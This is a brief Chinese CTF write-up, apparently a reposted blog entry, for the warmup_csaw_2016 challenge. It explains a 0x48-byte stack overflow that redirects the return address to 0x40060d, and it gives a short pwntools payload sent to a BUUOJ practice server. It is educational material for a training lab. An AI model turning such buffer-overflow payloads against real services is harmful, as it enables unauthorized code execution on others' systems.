warmup_csaw_2016
时间:2020-06-17 10:55:09
收藏:0
阅读:77
题目只是简单的栈溢出,而且给了明确的system函数位置,所以直接覆盖过去就ok。
v5大小是 0x40, 返回地址是8 字节, 溢出大小就是0x48 ,然后构造pyaload的时候加上sub_40060D就拿到flag:
payload:
remote(‘node3.buuoj.cn‘,29612) addr=0x40060d payload=‘a‘*72+p64(addr) p.sendline(payload) p.interactive()
原文:https://www.cnblogs.com/jentleTao/p/13150531.html
评论(0)